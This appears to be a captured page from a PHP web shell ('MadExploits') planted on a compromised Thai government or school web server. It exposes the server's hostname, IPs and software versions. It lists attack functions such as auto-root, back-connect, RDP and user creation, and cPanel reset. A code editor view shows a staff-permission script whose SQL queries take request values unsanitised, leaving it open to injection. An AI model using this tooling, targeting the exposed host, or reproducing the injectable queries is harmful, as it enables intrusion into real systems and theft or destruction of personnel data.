Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
amss /
modules /
person /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
manual
[ DIR ]
drwxr-xr-x
picture
[ DIR ]
drwxrwxrwx
signature
[ DIR ]
drwxr-xr-x
upload
[ DIR ]
drwxrwxrwx
birthday_import.php
4.08
KB
-rw-r--r--
change_status_person.php
11.65
KB
-rwxr-xr-x
change_status_person_sch.php
18.67
KB
-rwxr-xr-x
default.php
258
B
-rwxr-xr-x
delegate_sch.php
15.53
KB
-rwxr-xr-x
export_to_excel.php
1.99
KB
-rwxr-xr-x
getxml_person.php
10.53
KB
-rw-r--r--
getxml_person.phpฯศฏ
8.94
KB
-rwxr-xr-x
index.php
337
B
-rwxr-xr-x
lack_person.php
10.24
KB
-rw-r--r--
livesearch.php
616
B
-rwxr-xr-x
livesearch_2.php
608
B
-rwxr-xr-x
livesearch_3.php
622
B
-rwxr-xr-x
livesearch_4.php
630
B
-rwxr-xr-x
livesearch_mobile.php
623
B
-rwxr-xr-x
menu.php
6.16
KB
-rw-r--r--
menu_mobile.php
960
B
-rwxr-xr-x
permission.php
8.55
KB
-rwxr-xr-x
person.php
19.45
KB
-rwxr-xr-x
person1111.php
16.77
KB
-rwxr-xr-x
person_import.php
4.46
KB
-rwxr-xr-x
person_report1.php
5.5
KB
-rwxr-xr-x
person_report1_mobile.php
1.89
KB
-rwxr-xr-x
person_sch.php
29.12
KB
-rwxr-xr-x
person_sch111.php
25.17
KB
-rwxr-xr-x
person_sch2.php
8.2
KB
-rwxr-xr-x
person_sch_import.php
4.55
KB
-rwxr-xr-x
person_sch_other.php
12.11
KB
-rwxr-xr-x
person_sch_report1.php
12.47
KB
-rwxr-xr-x
person_sch_report1_mobile.php
8.76
KB
-rwxr-xr-x
pic_show.php
1.26
KB
-rwxr-xr-x
pic_show.php~
871
B
-rwxr-xr-x
pic_show_2.php
1.13
KB
-rwxr-xr-x
pic_show_2.php~
871
B
-rwxr-xr-x
position.php
6.36
KB
-rwxr-xr-x
return_ajax_schperson.php
710
B
-rwxr-xr-x
sch_position.php
11.23
KB
-rwxr-xr-x
school.php
3.11
KB
-rwxr-xr-x
signature.php
5.94
KB
-rw-r--r--
signature_show.php
1.33
KB
-rw-r--r--
time_inc.php
955
B
-rw-r--r--
update_picture1.php
1.73
KB
-rwxr-xr-x
update_picture2.php
1.74
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : permission.php
<?php /** ensure this file is being included by a parent file */ defined( '_VALID_' ) or die( 'Direct Access to this location is not allowed.' ); if(!(($_SESSION['admin_person']=="person") or ($_SESSION['login_status']==99) or ($_SESSION['login_status']<=4 and $result_permission['p1']==1))){ exit(); } //ส่วนหัว echo "<br />"; if(!(($index==1) or ($index==2) or ($index==5))){ echo "<table width='50%' border='0' align='center'>"; echo "<tr align='center'><td><font color='#006666' size='3'><strong>เจ้าหน้าที่ข้อมูลพื้นฐานครูและบุคลากร</strong></font></td></tr>"; echo "</table>"; } //ส่วนฟอร์มรับข้อมูล if($index==1){ echo "<form id='frm1' name='frm1'>"; echo "<Center>"; echo "<Font color='#006666' Size=3><B>เพิ่มเจ้าหน้าที่</Font>"; echo "</Cener>"; echo "<Br><Br>"; echo "<Table width='50%' Border='0' Bgcolor='#Fcf9d8'>"; echo "<Tr><Td align='right'>บุคลากร </Td>"; echo "<td><div align='left'><Select name='person_id' size='1'>"; echo "<option value = ''>เลือก</option>" ; $sql = "select * from person_main where status='0' order by name"; $dbquery = mysqli_query($connect,$sql); While ($result = mysqli_fetch_array($dbquery)) { $person_id = $result['person_id']; $name = $result['name']; $surname = $result['surname']; echo "<option value = $person_id>$name $surname</option>" ; } echo "</select>"; echo "</div></td></tr>"; echo "<tr><td align='right'>อนุญาตให้เป็นเจ้าหน้าที่ </td>"; echo "<td align='left'>ใช่<input type=radio name='person_permission1' value='1'> ไม่ใช่<input type=radio name='person_permission1' value='0' checked></td></tr>"; echo "<tr><td> </td><td> </td></tr>"; echo "<tr><td align='right'><INPUT TYPE='button' name='smb' value='ตกลง' onclick='goto_url(1)'> </td>"; echo "<td align='left'><INPUT TYPE='button' name='back' value='ย้อนกลับ' onclick='goto_url(0)'></td></tr>"; echo "</Table>"; echo "</form>"; } //ส่วนยืนยันการลบข้อมูล if($index==2) { echo "<table width='500' border='0' align='center'>"; echo "<tr><td align='center'><font color='#990000' size='4'>โปรดยืนยันความต้องการลบข้อมูลอีกครั้ง</font><br></td></tr>"; echo "<tr><td align=center>"; echo "<INPUT TYPE='button' name='smb' value='ยืนยัน' onclick='location.href=\"?option=person&task=permission&index=3&id=$_GET[id]\"'> <INPUT TYPE='button' name='back' value='ยกเลิก' onclick='location.href=\"?option=person&task=permission\"'"; echo "</td></tr></table>"; } //ส่วนลบข้อมูล if($index==3){ $sql = "delete from person_permission where id=$_GET[id]"; $dbquery = mysqli_query($connect,$sql); echo "<script>document.location.href='?option=person&task=permission'; </script>\n"; } //ส่วนบันทึกข้อมูล if($index==4){ $rec_date = date("Y-m-d"); $sql = "insert into person_permission (person_id, p1, officer,rec_date) values ('$_POST[person_id]', '$_POST[person_permission1]','$_SESSION[login_user_id]','$rec_date')"; $dbquery = mysqli_query($connect,$sql); echo "<script>document.location.href='?option=person&task=permission'; </script>\n"; } //ส่วนฟอร์มแก้ไขข้อมูล if ($index==5){ echo "<form id='frm1' name='frm1'>"; echo "<Center>"; echo "<Font color='#006666' Size=3><B>แก้ไข เจ้าหน้าที่</B></Font>"; echo "</Cener>"; echo "<Br><Br>"; echo "<Table width='50%' Border= '0' Bgcolor='#Fcf9d8'>"; $sql = "select * from person_permission where id='$_GET[id]'"; $dbquery = mysqli_query($connect,$sql); $ref_result = mysqli_fetch_array($dbquery); echo "<Tr><Td align='right'>บุคลากร </Td>"; echo "<td><div align='left'><Select name='person_id' size='1'>"; echo "<option value = ''>เลือก</option>" ; $sql = "select * from person_main where status='0' order by name"; $dbquery = mysqli_query($connect,$sql); While ($result = mysqli_fetch_array($dbquery)) { $person_id = $result['person_id']; $name = $result['name']; $surname = $result['surname']; if($person_id==$ref_result['person_id']){ echo "<option value = $person_id selected>$name $surname</option>"; } else{ echo "<option value = $person_id>$name $surname</option>"; } } echo "</select>"; echo "</div></td></tr>"; if($ref_result['p1']==1){ $p1_check1="checked"; $p1_check2=""; } else{ $p1_check1=""; $p1_check2="checked"; } echo "<tr><td align='right'>อนุญาตให้เป็นเจ้าหน้าที่ได้ </td>"; echo "<td align='left'>ใช่<input type=radio name='person_permission1' value='1' $p1_check1> ไม่ใช่<input type=radio name='person_permission1' value='0' $p1_check2></td></tr>"; echo "<tr><td> </td><td> </td></tr>"; echo "<tr><td align='right'><INPUT TYPE='button' name='smb' value='ตกลง' onclick='goto_url_update(1)'> </td>"; echo "<td align='left'><INPUT TYPE='button' name='back' value='ย้อนกลับ' onclick='goto_url_update(0)'></td></tr>"; echo "</Table>"; echo "<Br>"; echo "<Input Type=Hidden Name='id' Value='$_GET[id]'>"; echo "</form>"; } //ส่วนปรับปรุงข้อมูล if ($index==6){ $rec_date = date("Y-m-d"); $sql = "update person_permission set person_id='$_POST[person_id]', p1='$_POST[person_permission1]', officer='$_SESSION[login_user_id]', rec_date='$rec_date' where id='$_POST[id]'"; $dbquery = mysqli_query($connect,$sql); echo "<script>document.location.href='?option=person&task=permission'; </script>\n"; } //ส่วนแสดงผล if(!(($index==1) or ($index==2) or ($index==5))){ $sql = "select person_permission.id, person_permission.p1, person_main.name, person_main.surname from person_permission left join person_main on person_permission.person_id=person_main.person_id order by person_permission.id"; $dbquery = mysqli_query($connect,$sql); echo "<table width='50%' border='0' align='center'>"; echo "<Tr><Td colspan='5' align='left'><INPUT TYPE='button' name='smb' value='เพิ่มเจ้าหน้าที่' onclick='location.href=\"?option=person&task=permission&index=1\"'</Td></Tr>"; echo "</Table>"; echo "<table width='50%' border='1' align='center' style='border-collapse: collapse'>"; echo "<Tr bgcolor='#FFCCCC'><Td align='center' rowspan='2' >ที่</Td><Td align='center' rowspan='2' >ชื่อเจ้าหน้าที่</Td><td align='center'>สิทธื์</td><Td align='center' rowspan='2' width='50'>ลบ</Td><Td align='center' rowspan='2' width='50'>แก้ไข</Td></Tr>"; echo "<tr bgcolor='#CC9900'><Td align='center' width='80'>เจ้าหน้าที่</Td></tr>"; $M=1; While ($result = mysqli_fetch_array($dbquery)) { $id = $result['id']; $name = $result['name']; $surname = $result['surname']; if($result['p1']==1){ $p1_pic="<img src=images/yes.png border='0' alt='มีสิทธิ์'>"; } else{ $p1_pic="<img src=images/no.png border='0' alt='ไม่มีสิทธิ์'>"; } if(($M%2) == 0) $color="#FFFFC"; else $color="#FFFFFF"; echo "<Tr bgcolor=$color><Td align='center' width='50'>$M</Td><Td align='left'>$name $surname</Td><Td align='center'>$p1_pic</Td> <Td align='center' width='50' ><a href=?option=person&task=permission&index=2&id=$id><img src=images/drop.png border='0' alt='ลบ'></a></Td> <Td align='center' width='50'><a href=?option=person&task=permission&index=5&id=$id><img src=images/edit.png border='0' alt='แก้ไข'></a></Td> </Tr>"; $M++; } echo "</Table>"; } ?> <script> function goto_url(val){ if(val==0){ callfrm("?option=person&task=permission"); // page ย้อนกลับ }else if(val==1){ if(frm1.person_id.value == ""){ alert("กรุณาเลือกบุคลากร"); }else{ callfrm("?option=person&task=permission&index=4"); //page ประมวลผล } } } function goto_url_update(val){ if(val==0){ callfrm("?option=person&task=permission"); // page ย้อนกลับ }else if(val==1){ if(frm1.person_id.value == ""){ alert("กรุณาเลือกบุคลากร"); }else{ callfrm("?option=person&task=permission&index=6"); //page ประมวลผล } } } </script>
Close
